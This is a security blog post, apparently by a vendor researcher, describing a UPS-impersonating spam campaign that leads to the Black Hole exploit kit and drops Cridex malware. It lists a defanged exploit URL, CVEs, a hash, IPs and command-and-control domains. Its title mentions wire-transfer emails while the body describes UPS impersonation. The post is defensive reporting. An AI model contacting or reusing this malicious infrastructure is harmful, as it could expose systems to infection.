Spamvertised ‘Wire Transfer Confirmation’ themed emails lead to Black Hole exploit kit

by


Over the past 24 hours, cybercriminals started spamvertising millions of emails impersonating the United Parcel Service (UPS) in an attempt to trick end and corporate users into previewing a malicious .html attachment. Upon previewing it, a tiny iFrame attempts to contact a client-side exploits serving a landing URL, courtesy of the Black Hole web malware exploitation kit.

More details:

Sample screenshot of the spamvertised email:

Sample client-side exploits serving URL: hxxp://mskoblastionline.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c

Sample exploits served: CVE-2010-0188; CVE-2010-1885

Upon successful client-side exploitation, the campaign drops MD5: 7fe4d2e52b6f3f22b2f168e8384a757e – detected by 28 out of 42 antivirus scanners as Worm:Win32/Cridex.E; Trojan.Win32.Buzus.lxwt

mskoblastionline.ru – 50.56.92.47; 190.120.228.92; 203.80.16.81

Name servers part of the campaign’s infrastructure:
ns1.mskoblastionline.ru – 85.143.166.186
ns2.mskoblastionline.ru – 203.172.140.202
ns3.mskoblastionline.ru – 87.120.41.155
ns4.mskoblastionline.ru – 173.224.208.60
ns5.mskoblastionline.ru – 132.248.49.112

Responding to these IPs are also the following malicious command and control servers:

penelopochka.ru
sergikgorec.ru
kolmykiaonline.ru
mskoblastionline.ru
panalki.ru
anapoli.ru
flumifrator2unix.ru

We’ve already seen these domains and IPs used in previously profiled campaigns such as the “Spamvertised ‘Fwd: Scan from a Hewlett-Packard ScanJet’ emails lead to Black Hole exploit kit“, and the “Cybercriminals impersonate Intuit Market, mass mail millions of exploits and malware serving emails” campaign.

This isn’t the first time we’ve profiled malicious campaigns impersonating the United Parcel Service. Consider going through related posts profiling the dynamics of related campaigns:

Webroot SecureAnywhere users are proactively protected from this threat.

You can find more about Dancho Danchev at his LinkedIn Profile. You can also follow him on  Twitter.


Trackbacks

  1. [...] Spamvertised ‘Wire Transfer Confirmation’ themed emails lead to Black Hole exploit kit [...]

  2. ניהול תיק השקעות באינטרנט…

    … ניהול תיק השקעות השוואה – מקצועיות – למרות שכולנו חכמים וכולנו נבונים יש עדיפות למישהו שהוא מקצועי מאיתנו לנהל את התיק. בבניית תיק השקעות הינה מה אפיק ההשקעה המתאים ביותר לצורך הגדלת התשואה והפקת רווחים…. Spamvertised 'Wire Transfer Confi…